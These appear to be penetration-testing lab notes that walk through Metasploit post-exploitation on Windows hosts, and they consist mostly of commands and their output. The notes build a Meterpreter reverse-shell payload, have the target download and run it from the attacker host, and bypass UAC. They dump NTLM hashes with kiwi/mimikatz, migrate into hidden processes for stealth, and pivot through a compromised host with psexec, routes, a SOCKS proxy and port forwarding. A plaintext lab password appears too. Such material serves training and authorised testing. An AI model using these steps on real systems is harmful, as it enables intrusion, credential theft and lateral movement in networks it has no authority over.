Post-Exploitation

Meterpreter

# Create a non-staged payload
$ msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.232 LPORT=443 -f exe -o met.exe

# Setup listener
$ sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https
msf6 > set LHOST tun0
msf6 > set LPORT 443
msf6 > run

# Download and execute the payload on the target
$ nc 192.168.241.223 4444
Microsoft Windows [Version 10.0.22000.1219]
(c) Microsoft Corporation. All rights reserved.

C:\Users\luiza>powershell iwr -uri http://192.168.45.232/met.exe -OutFile met.exe
powershell iwr -uri http://192.168.45.232/met.exe -OutFile met.exe

C:\Users\luiza>.\met.exe
.\met.exe

# Catch the reverse shell
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.45.232:443
...
[*] Meterpreter session 1 opened (192.168.45.232:443 -> 192.168.241.223:49595) at 2025-04-24 11:08:44 +0300

meterpreter >

Inactivity Check

Determines user inactivity; useful for stealth.

meterpreter > idletime

Privilege Escalation

Attempts SYSTEM-level access using techniques like Named Pipe Impersonation leveraging the SeImpersonatePrivilege and SeDebugPrivilege.

meterpreter > getsystem

Process Migration

Moves session to another process to maintain stealth/persistence. Migration is only possible to processes with equal or lower security levels.

meterpreter > ps
meterpreter > migrate <PID>

If no suitable existing process is available, it can start a hidden process and migrate into it.

execute -H -f notepad
migrate <PID>

Modules

UAC Bypass

A typical client-side attack usually provides only an unprivileged shell. However, when the target user is a local administrator, we can attempt to elevate the shell's integrity level by bypassing User Account Control (UAC).

The process below (5656) is running with a medium integrity level, meaning administrative actions would still be blocked by UAC.

# Identify current privilege/integrity level
meterpreter > shell
Process 5656 created.
...
C:\Windows\system32>powershell -ep bypass
PS C:\Windows\system32> Import-Module NtObjectManager
PS C:\Windows\system32> Get-NtTokenIntegrityLevel
Medium

# Escalate privileges
PS C:\Windows\system32> ^Z
Background channel 1? [y/N]  y
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > search UAC
... 
   21  exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
...
 msf6 exploit(multi/handler) > use 21
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_sdclt) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  2         meterpreter x64/windows  ITWK01\offsec @ ITWK01  192.168.45.232:443 -> 192.168.241.223:49294 (192.168.241.223)

msf6 exploit(windows/local/bypassuac_sdclt) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_sdclt) > set LHOST 192.168.45.232
LHOST => 192.168.45.232
msf6 exploit(windows/local/bypassuac_sdclt) > run
...
meterpreter > shell
Process 7068 created.
C:\Windows\system32>powershell -ep bypass
PS C:\Windows\system32> Import-Module NtObjectManager
PS C:\Windows\system32> Get-NtTokenIntegrityLevel
High

Kiwi

With elevated privileges with can also load MSF's extensions, such as kiwi, a wrapper around mimikatz. The creds_msv extracts LM and NTLM hashes.

# Load mimikatz module
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > load kiwi
meterpreter > creds_msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

Username  Domain  NTLM              SHA1
--------  ------  ----              ----
luiza     ITWK01  167<REDACTED>837
offsec    ITWK01  1c3<REDACTED>bbd

Pivoting

Dual-homed machines can act as bridges between networks.

# Identify dual-homed system
$ nc 192.168.241.223 4444
C:\Users\luiza>ipconfig
...
Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::8a:de6d:6427:dabb%11
   IPv4 Address. . . . . . . . . . . : 192.168.241.223
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.241.254

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::6fa3:81f6:4ac1:1504%14
   IPv4 Address. . . . . . . . . . . : 172.16.196.199
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Route add

We can manually add a route to the second network (172.16.16.0/24) through the existing session in order to enable MSF to route traffic through a compromised host. This allows Metasploit to "see" and interact with devices on that internal network.

Routes in Metasploit let you scan and exploit targets behind firewalls or NAT by tunneling through a compromised host.

meterpreter > bg
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > route add 172.16.196.0/24 5
[*] Route added
msf6 exploit(multi/handler) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.16.196.0       255.255.255.0      Session 5

[*] There are currently no IPv6 routes defined.

msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.196.200
RHOSTS => 172.16.196.200
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 445,3389
PORTS => 445,3389
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 172.16.196.200:       - 172.16.196.200:445 - TCP OPEN
[+] 172.16.196.200:       - 172.16.196.200:3389 - TCP OPEN
[*] 172.16.196.200:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With the route added, we can now use MSF modules to compromise the second target. The bind_tcp payload is used because the target can’t initiate outbound traffic, but our attacking machine can connect to it instead.

msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/psexec
...
smsf6 exploit(windows/smb/psexec) > set SMBUser luiza
SMBUser => luiza
msf6 exploit(windows/smb/psexec) > set SMBPass 'BoccieDearAeroMeow1!'
SMBPass => BoccieDearAeroMeow1!
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.16.196.200
RHOSTS => 172.16.196.200
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set LPORT 8000
LPORT => 8000
msf6 exploit(windows/smb/psexec) > run
...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Autoroute

Instead of adding routes manually, the autoroute module automatically adds all routable subnets from the compromised host.

msf6 exploit(multi/handler) > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > sessions

Active sessions
===============

  Id  Name  Type                     Information            Connection
  --  ----  ----                     -----------            ----------
  7         meterpreter x64/windows  ITWK01\luiza @ ITWK01  192.168.45.232:443 -> 192.168.241.223:50215 (192.168.241.223)

msf6 post(multi/manage/autoroute) > set SESSION 7
SESSION => 7
msf6 post(multi/manage/autoroute) > run
[*] Running module against ITWK01
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.196.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.241.0/255.255.255.0 from host's routing table.
[*] Post module execution completed

Socks_proxy

With a route in place, the socks_proxy module sets up a SOCKS5 proxy server on the attacker's machine. This enables tunneling through compromised host using proxychains, which lets any external app (like RDP clients) act as if it’s inside the internal network.

SOCKS proxy + proxychains = full tool access to pivoted networks.

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server

$ tail -n1 /etc/proxychains.conf
socks5  127.0.0.1 1080
$ sudo proxychains xfreerdp /v:172.16.196.200 /u:luiza /p:'BoccieDearAeroMeow1!' /smart-sizing

Portfwd

Instead of a SOCKS proxy, we can forwards traffic from the attacker's machine directly to the internal target. This maps an internal service to a local port, allowing direct tool access.

meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.196.200
[*] Forward TCP relay created: (local) :3389 -> (remote) 172.16.196.200:3389

$ sudo xfreerdp /v:127.0.0.1 /u:luiza /p:'BoccieDearAeroMeow1!' /smart-sizing